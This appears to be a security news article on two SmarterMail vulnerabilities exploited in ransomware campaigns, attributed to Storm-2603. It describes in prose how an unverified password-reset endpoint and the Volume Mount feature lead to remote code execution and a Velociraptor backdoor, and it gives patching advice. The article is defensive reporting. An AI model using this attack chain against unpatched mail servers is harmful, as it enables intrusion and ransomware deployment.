Ransomware, Vulnerability Management, Patch/Configuration Management, Email security

SmarterMail vulnerabilities exploited in ransomware campaigns

Ransomware groups are actively exploiting two recently patched SmarterTools SmarterMail vulnerabilities that could lead to remote code execution (RCE) without authentication.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added one of the critical flaws, tracked as CVE-2026-24423, to its Known Exploited Vulnerabilities catalog on Thursday, flagging it as being actively exploited in ransomware campaigns.

CVE-2026-24423, which was patched on Jan. 23, 2026, allows attackers to abuse SmarterMail’s ConnectToHub API to deliver a malicious OS command from a remote server, achieving unauthenticated RCE.

The other critical flaw, tracked as CVE-2026-23760, enables authentication bypass via the password reset API. The force-reset-password endpoint fails to verify that the supplied old password is correct, allowing anyone to reset a password by supplying just a username. This could be exploited to reset administrator passwords and gain full control over a vulnerable SmarterMail instance.

SmarterMail vulnerabilities exploited by China-based threat group

ReliaQuest reported Monday that a China-based ransomware threat actor tracked as Storm-2603 was actively exploiting CVE-2026-23760 and explained how the group abused SmarterMail’s built-in “Volume Mount” feature to escalate from authentication bypass to RCE.

Although no ransomware executable was deployed in the observed attack, ReliaQuest said the activity was consistent with Storm-2603’s staging for Warlock ransomware.


Related reading:


The Volume Mount feature allows administrators to provide commands for mounting network drives but accepts arbitrary commands due to trust in the administrator role, ReliaQuest explained. After leveraging the password reset flaw to gain admin access, Storm-2603 used this feature to execute malicious commands and install the forensic software Velociraptor, which it uses as a backdoor.

Velociraptor is a legitimate open-source endpoint monitoring, digital forensics and incident response software that Storm-2603 has been known to abuse for command-and-control (C2) communications and staging for Warlock ransomware.

In the attack targeting SmarterMail for initial access, the group used the SmarterMail process MailService.exe to spawn a command shell and ultimately trigger the Windows Installer to install a payload called v4.msi hosted on the legitimate cloud-based platform Supabase. ReliaQuest noted that Storm-2603 previously hosted payloads on GitHub, with the shift to Supabase likely aiding in evasion due to the platform’s trusted reputation.

 The v4.msi payload installs Velociraptor, which is then configured for C2 connection to the attacker’s server. The use of legitimate forensics software also lowers the chance of detection, and typically precedes Warlock ransomware deployment in Storm-2603 attacks.

ReliaQuest said it also observed suspicious ConnecToHub API calls on the affected SmarterMail server, indicating likely scanning for susceptibility to CVE-2026-24423. However, these calls came from separate infrastructure than that used by Storm-2603 and may have originated from a different threat actor.

The researchers noted that both vulnerabilities offer a path to RCE for threat actors and that the discovery of artifacts for both vulnerabilities on the same instance highlights the urgent need to patch both flaws.

Both flaws can be resolved by upgrading to SmarterMail Build 9511. ReliaQuest also recommends isolation of the mail server from the rest of the internal network and restriction of outbound mail server traffic to only necessary email protocols.

An In-Depth Guide to Ransomware

Get essential knowledge and practical strategies to protect your organization from ransomware attacks.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds